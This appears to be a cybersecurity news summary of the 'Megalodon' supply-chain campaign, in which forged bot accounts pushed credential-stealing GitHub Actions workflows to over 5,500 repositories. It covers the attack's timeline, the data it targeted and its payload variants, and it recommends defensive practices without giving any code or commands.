A sophisticated and automated cyberattack campaign, dubbed "Megalodon," has successfully infiltrated over 5,500 GitHub repositories within a mere six-hour window. The attack, which occurred on May 18, 2026, exploited malicious CI/CD workflows to exfiltrate sensitive data, including cloud credentials, API keys, and source code secrets, marking a significant escalation in software supply chain threats.

Key Takeaways

• Over 5,500 GitHub repositories were compromised in a rapid, automated attack.

• Attackers used forged identities and deceptive commit messages to inject malicious GitHub Actions workflows.

• The malware targeted a wide range of sensitive data, including cloud credentials, SSH keys, and OIDC tokens.

• The campaign highlights a new era of supply chain attacks, posing a significant threat to developers worldwide.

The Megalodon Campaign Unveiled

Cybersecurity researchers have detailed the alarming scope of the Megalodon campaign, which saw 5,718 malicious commits pushed to 5,561 distinct GitHub repositories between 11:36 a.m. and 5:48 p.m. UTC on May 18, 2026. The attackers employed throwaway GitHub accounts with randomized usernames and forged author identities such as "build-bot," "auto-ci," "ci-bot," and "pipeline-bot." These were used to inject base64-encoded bash payloads within GitHub Actions workflows, disguised as routine CI maintenance.

Data Exfiltration and Payload Variants

The primary objective of the Megalodon malware was to harvest a comprehensive list of sensitive information. This included:

• CI environment variables and cloud credentials (AWS, Google Cloud, Azure)

• SSH private keys and Docker/Kubernetes configurations

• Vault tokens and Terraform credentials

• API keys, database connection strings, JWTs, and PEM private keys

• GitHub Actions OIDC tokens and other CI/CD tokens

• Configuration files like .env and credentials.json

Two payload variants were observed: "SysDiag," a mass variant triggered on every push and pull request, and "Optimize-Build," a targeted variant activated only on manual workflow dispatch. The latter was used in the compromise of the @tiledesk/tiledesk-server npm package, where the malicious code was embedded within the GitHub Actions workflow, not the application code itself.

A New Era of Supply Chain Attacks

Experts warn that the Megalodon attack signifies a dangerous evolution in cyber threats, moving beyond individual user compromises to target the interconnected software supply chain. The attackers' ability to mimic legitimate CI processes and leverage trusted platforms like GitHub makes detection exceptionally challenging. This trend is expected to continue, with researchers anticipating an "endless wave" of attacks targeting developers globally. The fallout from such attacks underscores the critical need for enhanced security practices, including rigorous auditing of CI/CD workflows, prompt credential rotation, and the adoption of zero-trust security principles.

Sources

• Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows, The Hacker News.

• New Megalodon Malware Hits Thousands of GitHub Projects, SQ Magazine.

• Megalodon Malware Compromised 5,500+ GitHub Repos Within 6 Hours, CyberSecurityNews.

• Megalodon Malware Compromised 5,500+ GitHub Repositories, Cyber Press.